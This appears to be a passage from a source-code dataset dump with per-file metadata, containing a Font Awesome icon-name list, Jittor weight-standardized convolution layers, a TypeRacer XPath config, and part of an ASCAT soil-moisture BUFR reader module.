"faSynagogue"),("faSync","faSync"),("faSyncAlt","faSyncAlt"),("faSyringe","faSyringe"),("faTable","faTable"),("faTableTennis","faTableTennis"),("faTablet","faTablet"),("faTabletAlt","faTabletAlt"),("faTabletAndroid","faTabletAndroid"),("faTabletAndroidAlt","faTabletAndroidAlt"),("faTabletRugged","faTabletRugged"),("faTablets","faTablets"),("faTachometer","faTachometer"),("faTachometerAlt","faTachometerAlt"),("faTachometerAltAverage","faTachometerAltAverage"),("faTachometerAltFast","faTachometerAltFast"),("faTachometerAltFastest","faTachometerAltFastest
"),("faTachometerAltSlow","faTachometerAltSlow"),("faTachometerAltSlowest","faTachometerAltSlowest"),("faTachometerAverage","faTachometerAverage"),("faTachometerFast","faTachometerFast"),("faTachometerFastest","faTachometerFastest"),("faTachometerSlow","faTachometerSlow"),("faTachometerSlowest","faTachometerSlowest"),("faTaco","faTaco"),("faTag","faTag"),("faTags","faTags"),("faTally","faTally"),("faTanakh","faTanakh"),("faTape","faTape"),("faTasks","faTasks"),("faTasksAlt","faTasksAlt"),("faTaxi","faTaxi"),("faTeamspeak","faTeamspeak"),("faTeeth","faTeeth"),("faTeethOpen","faTeethOpen"),("faTelegram","faTelegram"),("faTelegramPlane","faTelegramPlane"),("faTelescope","faTelescope"),("faTemperatureDown","faTemperatureDown"),("faTemperatureFrigid","faTemperatureFrigid"),("faTemperatureHigh","faTemperatureHigh"),("faTemperatureHot","faTemperatureHot"),("faTemperatureLow","faTemperatureLow"),("faTemperatureUp","faTemperatureUp"),("faTencentWeibo","faTencentWeibo"),("faTenge","faTenge"),("faTennisBall","faTennisBall"),("faTerminal","faTerminal"),("faText","faText"),("faTextHeight","faTextHeight"),("faTextSize","faTextSize"),("faTextWidth","faTextWidth"),("faTh","faTh"),("faThLarge","faThLarge"),("faThList","faThList"),("faTheRedYeti","faTheRedYeti"),("faTheaterMasks","faTheaterMasks"),("faThemeco","faThemeco"),("faThemeisle","faThemeisle"),("faThermometer","faThermometer"),("faThermometerEmpty","faThermometerEmpty"),("faThermometerFull","faThermometerFull"),("faThermometerHalf","faThermometerHalf"),("faThermometerQuarter","faThermometerQuarter"),("faThermometerThreeQuarters","faThermometerThreeQuarters"),("faTheta","faTheta"),("faThinkPeaks","faThinkPeaks"),("faThumbsDown","faThumbsDown"),("faThumbsUp","faThumbsUp"),("faThumbtack","faThumbtack"),("faThunderstorm","faThunderstorm"),("faThunderstormMoon","faThunderstormMoon"),("faThunderstormSun","faThunderstormSun"),("faTicket","faTicket"),("faTicketAlt","faTicketAlt"),("faTiktok","faTiktok"),("faTilde","faTilde"),("faTim
es","faTimes"),("faTimesCircle","faTimesCircle"),("faTimesHexagon","faTimesHexagon"),("faTimesOctagon","faTimesOctagon"),("faTimesSquare","faTimesSquare"),("faTint","faTint"),("faTintSlash","faTintSlash"),("faTire","faTire"),("faTireFlat","faTireFlat"),("faTirePressureWarning","faTirePressureWarning"),("faTireRugged","faTireRugged"),("faTired","faTired"),("faToggleOff","faToggleOff"),("faToggleOn","faToggleOn"),("faToilet","faToilet"),("faToiletPaper","faToiletPaper"),("faToiletPaperAlt","faToiletPaperAlt"),("faToiletPaperSlash","faToiletPaperSlash"),("faTombstone","faTombstone"),("faTombstoneAlt","faTombstoneAlt"),("faToolbox","faToolbox"),("faTools","faTools"),("faTooth","faTooth"),("faToothbrush","faToothbrush"),("faTorah","faTorah"),("faToriiGate","faToriiGate"),("faTornado","faTornado"),("faTractor","faTractor"),("faTradeFederation","faTradeFederation"),("faTrademark","faTrademark"),("faTrafficCone","faTrafficCone"),("faTrafficLight","faTrafficLight"),("faTrafficLightGo","faTrafficLightGo"),("faTrafficLightSlow","faTrafficLightSlow"),("faTrafficLightStop","faTrafficLightStop"),("faTrailer","faTrailer"),("faTrain","faTrain"),("faTram","faTram"),("faTransgender","faTransgender"),("faTransgenderAlt","faTransgenderAlt"),("faTransporter","faTransporter"),("faTransporter1","faTransporter1"),("faTransporter2","faTransporter2"),("faTransporter3","faTransporter3"),("faTransporterEmpty","faTransporterEmpty"),("faTrash","faTrash"),("faTrashAlt","faTrashAlt"),("faTrashRestore","faTrashRestore"),("faTrashRestoreAlt","faTrashRestoreAlt"),("faTrashUndo","faTrashUndo"),("faTrashUndoAlt","faTrashUndoAlt"),("faTreasureChest","faTreasureChest"),("faTree","faTree"),("faTreeAlt","faTreeAlt"),("faTreeChristmas","faTreeChristmas"),("faTreeDecorated","faTreeDecorated"),("faTreeLarge","faTreeLarge"),("faTreePalm","faTreePalm"),("faTrees","faTrees"),("faTrello","faTrello"),("faTriangle","faTriangle"),("faTriangleMusic","faTriangleMusic"),("faTrophy","faTrophy"),("faTrophyAlt","faTrophyA
lt"),("faTruck","faTruck"),("faTruckContainer","faTruckContainer"),("faTruckCouch","faTruckCouch"),("faTruckLoading","faTruckLoading"),("faTruckMonster","faTruckMonster"),("faTruckMoving","faTruckMoving"),("faTruckPickup","faTruckPickup"),("faTruckPlow","faTruckPlow"),("faTruckRamp","faTruckRamp"),("faTrumpet","faTrumpet"),("faTshirt","faTshirt"),("faTty","faTty"),("faTumblr","faTumblr"),("faTumblrSquare","faTumblrSquare"),("faTurkey","faTurkey"),("faTurntable","faTurntable"),("faTurtle","faTurtle"),("faTv","faTv"),("faTvAlt","faTvAlt"),("faTvMusic","faTvMusic"),("faTvRetro","faTvRetro"),("faTwitch","faTwitch"),("faTwitter","faTwitter"),("faTwitterSquare","faTwitterSquare"),("faTypewriter","faTypewriter"),("faTypo3","faTypo3"),("faUber","faUber"),("faUbuntu","faUbuntu"),("faUfo","faUfo"),("faUfoBeam","faUfoBeam"),("faUikit","faUikit"),("faUmbraco","faUmbraco"),("faUmbrella","faUmbrella"),("faUmbrellaBeach","faUmbrellaBeach"),("faUncharted","faUncharted"),("faUnderline","faUnderline"),("faUndo","faUndo"),("faUndoAlt","faUndoAlt"),("faUnicorn","faUnicorn"),("faUnion","faUnion"),("faUniregistry","faUniregistry"),("faUnity","faUnity"),("faUniversalAccess","faUniversalAccess"),("faUniversity","faUniversity"),("faUnlink","faUnlink"),("faUnlock","faUnlock"),("faUnlockAlt","faUnlockAlt"),("faUnsplash","faUnsplash"),("faUntappd","faUntappd"),("faUpload","faUpload"),("faUps","faUps"),("faUsb","faUsb"),("faUsbDrive","faUsbDrive"),("faUsdCircle","faUsdCircle"),("faUsdSquare","faUsdSquare"),("faUser","faUser"),("faUserAlien","faUserAlien"),("faUserAlt","faUserAlt"),("faUserAltSlash","faUserAltSlash"),("faUserAstronaut","faUserAstronaut"),("faUserChart","faUserChart"),("faUserCheck","faUserCheck"),("faUserCircle","faUserCircle"),("faUserClock","faUserClock"),("faUserCog","faUserCog"),("faUserCowboy","faUserCowboy"),("faUserCrown","faUserCrown"),("faUserEdit","faUserEdit"),("faUserFriends","faUserFriends"),("faUserGraduate","faUserGraduate"),("faUserHardHat","faUserHardHat"),("faU
serHeadset","faUserHeadset"),("faUserInjured","faUserInjured"),("faUserLock","faUserLock"),("faUserMd","faUserMd"),("faUserMdChat","faUserMdChat"),("faUserMinus","faUserMinus"),("faUserMusic","faUserMusic"),("faUserNinja","faUserNinja"),("faUserNurse","faUserNurse"),("faUserPlus","faUserPlus"),("faUserRobot","faUserRobot"),("faUserSecret","faUserSecret"),("faUserShield","faUserShield"),("faUserSlash","faUserSlash"),("faUserTag","faUserTag"),("faUserTie","faUserTie"),("faUserTimes","faUserTimes"),("faUserUnlock","faUserUnlock"),("faUserVisor","faUserVisor"),("faUsers","faUsers"),("faUsersClass","faUsersClass"),("faUsersCog","faUsersCog"),("faUsersCrown","faUsersCrown"),("faUsersMedical","faUsersMedical"),("faUsersSlash","faUsersSlash"),("faUsps","faUsps"),("faUssunnah","faUssunnah"),("faUtensilFork","faUtensilFork"),("faUtensilKnife","faUtensilKnife"),("faUtensilSpoon","faUtensilSpoon"),("faUtensils","faUtensils"),("faUtensilsAlt","faUtensilsAlt"),("faVaadin","faVaadin"),("faVacuum","faVacuum"),("faVacuumRobot","faVacuumRobot"),("faValueAbsolute","faValueAbsolute"),("faVectorSquare","faVectorSquare"),("faVenus","faVenus"),("faVenusDouble","faVenusDouble"),("faVenusMars","faVenusMars"),("faVest","faVest"),("faVestPatches","faVestPatches"),("faVhs","faVhs"),("faViacoin","faViacoin"),("faViadeo","faViadeo"),("faViadeoSquare","faViadeoSquare"),("faVial","faVial"),("faVials","faVials"),("faViber","faViber"),("faVideo","faVideo"),("faVideoPlus","faVideoPlus"),("faVideoSlash","faVideoSlash"),("faVihara","faVihara"),("faVimeo","faVimeo"),("faVimeoSquare","faVimeoSquare"),("faVimeoV","faVimeoV"),("faVine","faVine"),("faViolin","faViolin"),("faVirus","faVirus"),("faVirusSlash","faVirusSlash"),("faViruses","faViruses"),("faVk","faVk"),("faVnv","faVnv"),("faVoicemail","faVoicemail"),("faVolcano","faVolcano"),("faVolleyballBall","faVolleyballBall"),("faVolume","faVolume"),("faVolumeDown","faVolumeDown"),("faVolumeMute","faVolumeMute"),("faVolumeOff","faVolumeOff"),("faVolumeSlash
","faVolumeSlash"),("faVolumeUp","faVolumeUp"),("faVoteNay","faVoteNay"),("faVoteYea","faVoteYea"),("faVrCardboard","faVrCardboard"),("faVuejs","faVuejs"),("faWagonCovered","faWagonCovered"),("faWalker","faWalker"),("faWalkieTalkie","faWalkieTalkie"),("faWalking","faWalking"),("faWallet","faWallet"),("faWand","faWand"),("faWandMagic","faWandMagic"),("faWarehouse","faWarehouse"),("faWarehouseAlt","faWarehouseAlt"),("faWasher","faWasher"),("faWatch","faWatch"),("faWatchCalculator","faWatchCalculator"),("faWatchFitness","faWatchFitness"),("faWatchmanMonitoring","faWatchmanMonitoring"),("faWater","faWater"),("faWaterLower","faWaterLower"),("faWaterRise","faWaterRise"),("faWaveSine","faWaveSine"),("faWaveSquare","faWaveSquare"),("faWaveTriangle","faWaveTriangle"),("faWaveform","faWaveform"),("faWaveformPath","faWaveformPath"),("faWaze","faWaze"),("faWebcam","faWebcam"),("faWebcamSlash","faWebcamSlash"),("faWeebly","faWeebly"),("faWeibo","faWeibo"),("faWeight","faWeight"),("faWeightHanging","faWeightHanging"),("faWeixin","faWeixin"),("faWhale","faWhale"),("faWhatsapp","faWhatsapp"),("faWhatsappSquare","faWhatsappSquare"),("faWheat","faWheat"),("faWheelchair","faWheelchair"),("faWhistle","faWhistle"),("faWhmcs","faWhmcs"),("faWifi","faWifi"),("faWifi1","faWifi1"),("faWifi2","faWifi2"),("faWifiSlash","faWifiSlash"),("faWikipediaW","faWikipediaW"),("faWind","faWind"),("faWindTurbine","faWindTurbine"),("faWindWarning","faWindWarning"),("faWindow","faWindow"),("faWindowAlt","faWindowAlt"),("faWindowClose","faWindowClose"),("faWindowFrame","faWindowFrame"),("faWindowFrameOpen","faWindowFrameOpen"),("faWindowMaximize","faWindowMaximize"),("faWindowMinimize","faWindowMinimize"),("faWindowRestore","faWindowRestore"),("faWindows","faWindows"),("faWindsock","faWindsock"),("faWineBottle","faWineBottle"),("faWineGlass","faWineGlass"),("faWineGlassAlt","faWineGlassAlt"),("faWix","faWix"),("faWizardsOfTheCoast","faWizardsOfTheCoast"),("faWodu","faWodu"),("faWolfPackBattalion","faWolfPac
kBattalion"),("faWonSign","faWonSign"),("faWordpress","faWordpress"),("faWordpressSimple","faWordpressSimple"),("faWpbeginner","faWpbeginner"),("faWpexplorer","faWpexplorer"),("faWpforms","faWpforms"),("faWpressr","faWpressr"),("faWreath","faWreath"),("faWrench","faWrench"),("faXRay","faXRay"),("faXbox","faXbox"),("faXing","faXing"),("faXingSquare","faXingSquare"),("faYCombinator","faYCombinator"),("faYahoo","faYahoo"),("faYammer","faYammer"),("faYandex","faYandex"),("faYandexInternational","faYandexInternational"),("faYarn","faYarn"),("faYelp","faYelp"),("faYenSign","faYenSign"),("faYinYang","faYinYang"),("faYoast","faYoast"),("faYoutube","faYoutube"),("faYoutubeSquare","faYoutubeSquare"),("faZhihu","faZhihu")] | 70,659 | 70,659 | 0.738519 | 4,621 | 70,659 | 11.292145 | 0.500325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001132 | 0.000028 | 70,659 | 1 | 70,659 | 70,659 | 0.737379 | 0 | 0 | 0 | 0 | 0 | 0.738324 | 0.021257 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 8 |
a18a641527ec20841600bad5549ad8362509e565 | 6,381 | py | Python | backend/data/jimm/models/layers/std_conv.py | MikeOwino/JittorVis | d9568b72d684d167045121ea8ed22d694b2f9192 | [
"Apache-2.0"
] | 139 | 2021-06-24T10:32:02.000Z | 2021-06-26T10:22:07.000Z | backend/data/jimm/models/layers/std_conv.py | MikeOwino/JittorVis | d9568b72d684d167045121ea8ed22d694b2f9192 | [
"Apache-2.0"
] | 8 | 2021-06-29T07:29:06.000Z | 2022-02-28T02:16:48.000Z | backend/data/jimm/models/layers/std_conv.py | MikeOwino/JittorVis | d9568b72d684d167045121ea8ed22d694b2f9192 | [
"Apache-2.0"
] | 5 | 2021-06-27T21:04:03.000Z | 2021-08-14T03:26:17.000Z | """
Copyright VIP Group
Licensed under the Apache License, Version 2.0.
Modify from https://github.com/rwightman/pytorch-image-models
Original copyright of Ross Wightman below, modifications by VIP Group
Hacked together by / copyright Ross Wightman
"""
import numpy as np
import jittor as jt
import jittor.nn as F
from jittor import nn
from .padding import get_padding, get_padding_value, pad_same
def get_weight(module):
    """Standalone helper: weight-standardize a conv module's weights over the
    (in, kh, kw) axes. Note it uses NumPy's population std (ddof=0), unlike
    the sample std (n - 1) used by the layer methods below."""
    std, mean = np.std(module.weight.data, axis=(1, 2, 3), keepdims=True), \
        np.mean(module.weight.data, axis=(1, 2, 3), keepdims=True)
std, mean = jt.array(std), jt.array(mean)
weight = (module.weight - mean) / (std + module.eps)
return weight
class StdConv2d(nn.Conv2d):
"""Conv2d with Weight Standardization. Used for BiT ResNet-V2 models.
Paper: `Micro-Batch Training with Batch-Channel Normalization and Weight Standardization` -
https://arxiv.org/abs/1903.10520v2
"""
def __init__(
self, in_channel, out_channels, kernel_size, stride=1, padding=None,
dilation=1, groups=1, bias=False, eps=1e-5):
if padding is None:
padding = get_padding(kernel_size, stride, dilation)
super().__init__(
in_channel, out_channels, kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=groups, bias=bias)
self.eps = eps
def get_weight(self):
matsize = self.weight.shape[1] * self.weight.shape[2] * self.weight.shape[3]
mean = self.weight.mean(dims=(1, 2, 3), keepdims=True)
weight = self.weight - mean
std = (weight.sqr().sum(dims=(1, 2, 3), keepdims=True) / (matsize - 1)).sqrt()
weight /= (std + self.eps)
return weight
def execute(self, x):
x = F.conv2d(x, self.get_weight(), self.bias, self.stride, self.padding, self.dilation, self.groups)
return x
class StdConv2dSame(nn.Conv2d):
"""Conv2d with Weight Standardization. TF compatible SAME padding. Used for ViT Hybrid model.
Paper: `Micro-Batch Training with Batch-Channel Normalization and Weight Standardization` -
https://arxiv.org/abs/1903.10520v2
"""
def __init__(
self, in_channel, out_channels, kernel_size, stride=1, padding='SAME', dilation=1,
groups=1, bias=False, eps=1e-5):
padding, is_dynamic = get_padding_value(padding, kernel_size, stride=stride, dilation=dilation)
super().__init__(
in_channel, out_channels, kernel_size, stride=stride, padding=padding, dilation=dilation,
groups=groups, bias=bias)
self.same_pad = is_dynamic
self.eps = eps
def get_weight(self):
matsize = self.weight.shape[1] * self.weight.shape[2] * self.weight.shape[3]
mean = self.weight.mean(dims=(1, 2, 3), keepdims=True)
weight = self.weight - mean
std = (weight.sqr().sum(dims=(1, 2, 3), keepdims=True) / (matsize - 1)).sqrt()
weight /= (std + self.eps)
return weight
def execute(self, x):
if self.same_pad:
x = pad_same(x, self.kernel_size, self.stride, self.dilation)
x = F.conv2d(x, self.get_weight(), self.bias, self.stride, self.padding, self.dilation, self.groups)
return x
class ScaledStdConv2d(nn.Conv2d):
"""Conv2d layer with Scaled Weight Standardization.
Paper: `Characterizing signal propagation to close the performance gap in unnormalized ResNets` -
https://arxiv.org/abs/2101.08692
NOTE: the operations used in this impl differ slightly from the DeepMind Haiku impl. The impact is minor.
"""
def __init__(
self, in_channels, out_channels, kernel_size, stride=1, padding=None,
dilation=1, groups=1, bias=True, gamma=1.0, eps=1e-6, gain_init=1.0):
if padding is None:
padding = get_padding(kernel_size, stride, dilation)
super().__init__(
in_channels, out_channels, kernel_size, stride=stride, padding=padding, dilation=dilation,
groups=groups, bias=bias)
self.gain = jt.full((self.out_channels, 1, 1, 1), gain_init)
self.scale = gamma * self.weight[0].numel() ** -0.5 # gamma * 1 / sqrt(fan-in)
self.eps = eps
    def get_weight(self):
        matsize = self.weight.shape[1] * self.weight.shape[2] * self.weight.shape[3]
        mean = self.weight.mean(dims=(1, 2, 3), keepdims=True)
        weight = self.weight - mean
        std = (weight.sqr().sum(dims=(1, 2, 3), keepdims=True) / (matsize - 1)).sqrt()
        # Scaled WS: apply gamma / sqrt(fan-in) and the learnable per-channel
        # gain set up in __init__; without these the layer degenerates to
        # plain StdConv2d.
        weight = self.scale * weight / (std + self.eps)
        return self.gain * weight
def execute(self, x):
return F.conv2d(x, self.get_weight(), self.bias, self.stride, self.padding, self.dilation, self.groups)
class ScaledStdConv2dSame(nn.Conv2d):
"""Conv2d layer with Scaled Weight Standardization and Tensorflow-like SAME padding support
Paper: `Characterizing signal propagation to close the performance gap in unnormalized ResNets` -
https://arxiv.org/abs/2101.08692
NOTE: the operations used in this impl differ slightly from the DeepMind Haiku impl. The impact is minor.
"""
def __init__(
self, in_channels, out_channels, kernel_size, stride=1, padding='SAME',
dilation=1, groups=1, bias=True, gamma=1.0, eps=1e-6, gain_init=1.0):
padding, is_dynamic = get_padding_value(padding, kernel_size, stride=stride, dilation=dilation)
super().__init__(
in_channels, out_channels, kernel_size, stride=stride, padding=padding, dilation=dilation,
groups=groups, bias=bias)
self.gain = jt.full((self.out_channels, 1, 1, 1), gain_init)
self.scale = gamma * self.weight[0].numel() ** -0.5
self.same_pad = is_dynamic
self.eps = eps
    def get_weight(self):
        matsize = self.weight.shape[1] * self.weight.shape[2] * self.weight.shape[3]
        mean = self.weight.mean(dims=(1, 2, 3), keepdims=True)
        weight = self.weight - mean
        std = (weight.sqr().sum(dims=(1, 2, 3), keepdims=True) / (matsize - 1)).sqrt()
        # Scaled WS: apply gamma / sqrt(fan-in) and the learnable per-channel
        # gain set up in __init__; without these the layer degenerates to
        # plain StdConv2d.
        weight = self.scale * weight / (std + self.eps)
        return self.gain * weight
def execute(self, x):
if self.same_pad:
x = pad_same(x, self.kernel_size, self.stride, self.dilation)
return F.conv2d(x, self.get_weight(), self.bias, self.stride, self.padding, self.dilation, self.groups)
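The weight-standardization math used by every `get_weight` above (subtract the per-output-channel mean over the (in, kh, kw) axes, divide by the sample std plus eps) can be sketched without Jittor. This is a minimal pure-Python illustration on flat filters, not the layer itself; `standardize` and the sample filters are made up for the demo:

```python
import math

def standardize(weights, eps=1e-5):
    """Standardize each flat filter to zero mean and ~unit std,
    mirroring the per-output-channel normalization in StdConv2d."""
    out = []
    for w in weights:
        n = len(w)
        mean = sum(w) / n
        centered = [x - mean for x in w]
        # sample std with Bessel's correction (n - 1), matching get_weight
        std = math.sqrt(sum(c * c for c in centered) / (n - 1))
        out.append([c / (std + eps) for c in centered])
    return out

filters = [[1.0, 2.0, 3.0], [10.0, 10.0, 13.0]]
std_filters = standardize(filters)
```

After standardization each filter sums to zero regardless of its original scale, which is what makes the convolution's pre-activations well-behaved without batch statistics.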
| 41.705882 | 111 | 0.649115 | 880 | 6,381 | 4.596591 | 0.165909 | 0.054388 | 0.047466 | 0.027194 | 0.848949 | 0.848949 | 0.829666 | 0.829666 | 0.804944 | 0.7822 | 0 | 0.029191 | 0.226924 | 6,381 | 152 | 112 | 41.980263 | 0.790797 | 0.206394 | 0 | 0.762887 | 0 | 0 | 0.001608 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.134021 | false | 0 | 0.051546 | 0.010309 | 0.319588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a1ab36a2ec114009ca0471ca5112b5ddc87023f3 | 301 | py | Python | cfg.py | johnsonhung906/TypeRacerPro | 38baf409d49b0b3a68973e0762476890f6489aa7 | [
"MIT"
] | null | null | null | cfg.py | johnsonhung906/TypeRacerPro | 38baf409d49b0b3a68973e0762476890f6489aa7 | [
"MIT"
] | null | null | null | cfg.py | johnsonhung906/TypeRacerPro | 38baf409d49b0b3a68973e0762476890f6489aa7 | [
"MIT"
] | null | null | null | cfg = {
'site': 'https://play.typeracer.com/',
'start_xpath': '//*[@id="gwt-uid-2"]/a',
'passage_xpath': '//*[@id="gwt-uid-20"]/table/tbody/tr[2]/td/table/tbody/tr[1]/td/table/tbody/tr[1]/td/div',
'type_xpath': '//*[@id="gwt-uid-20"]/table/tbody/tr[2]/td/table/tbody/tr[2]/td/input',
} | 50.166667 | 112 | 0.581395 | 52 | 301 | 3.307692 | 0.442308 | 0.290698 | 0.348837 | 0.226744 | 0.610465 | 0.593023 | 0.488372 | 0.488372 | 0.488372 | 0.488372 | 0 | 0.036496 | 0.089701 | 301 | 6 | 113 | 50.166667 | 0.591241 | 0 | 0 | 0 | 0 | 0.333333 | 0.807947 | 0.592715 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
a1b13c8fa2444fc02f669597bb0edb3476a962df | 12,176 | py | Python | src/ascat/eumetsat.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | src/ascat/eumetsat.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | src/ascat/eumetsat.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | # Copyright (c) 2020, TU Wien, Department of Geodesy and Geoinformation
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of TU Wien, Department of Geodesy and Geoinformation
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL TU WIEN DEPARTMENT OF GEODESY AND
# GEOINFORMATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Readers for data downloaded from EUMETSAT data centre (UMARF)
"""
from ascat.read_native.bufr import AscatL2SsmBufr
from ascat.read_native.bufr import AscatL2SsmBufrChunked
from ascat.read_native.nc import AscatL2SsmNc
class AscatL2Ssm125(AscatL2SsmBufr):
"""
ASCAT A Level2 Soil Moisture at 12.5 km Swath Grid BUFR files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'M0?-ASCA-ASCSMR02-NA-5.0-%Y%m%d*.bfr'
file_search_str = 'M0?-ASCA-ASCSMR02-NA-5.0-{datetime}*.bfr'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (25, 39, '%Y%m%d%H%M%S')
super(AscatL2Ssm125, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
class AscatL2Ssm125PDU(AscatL2SsmBufr):
"""
ASCAT A Level2 Soil Moisture at 12.5 km Swath Grid PDU BUFR files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_125_ssm_l2.bin'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_125_ssm_l2.bin'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (63, 77, '%Y%m%d%H%M%S')
super(AscatL2Ssm125PDU, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
class AscatL2Ssm125PDUChunked(AscatL2SsmBufrChunked):
"""
ASCAT A Level2 Soil Moisture at 12.5 km Swath Grid PDU BUFR files from EUMETSAT
in 50 minute chunks.
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
chunk_minutes: int, optional
How many minutes should a chunk of data cover.
"""
def __init__(self, path, month_path_str='', chunk_minutes=100):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_125_ssm_l2.bin'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_125_ssm_l2.bin'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (63, 77, '%Y%m%d%H%M%S')
super(AscatL2Ssm125PDUChunked, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format,
chunk_minutes=chunk_minutes)
class AscatL2Ssm250(AscatL2SsmBufr):
"""
ASCAT A Level2 Soil Moisture at 25.0 km Swath Grid BUFR files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'M0?-ASCA-ASCSMO02-NA-5.0-%Y%m%d*.bfr'
file_search_str = 'M0?-ASCA-ASCSMO02-NA-5.0-{datetime}*.bfr'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (25, 39, '%Y%m%d%H%M%S')
super(AscatL2Ssm250, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
class AscatL2Ssm250PDU(AscatL2SsmBufr):
"""
ASCAT A Level2 Soil Moisture at 25 km Swath Grid PDU BUFR files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_250_ssm_l2.bin'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_250_ssm_l2.bin'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (63, 77, '%Y%m%d%H%M%S')
super(AscatL2Ssm250PDU, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
class AscatL2Ssm250PDUChunked(AscatL2SsmBufrChunked):
"""
ASCAT A Level2 Soil Moisture at 25 km Swath Grid PDU BUFR files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
chunk_minutes: int, optional
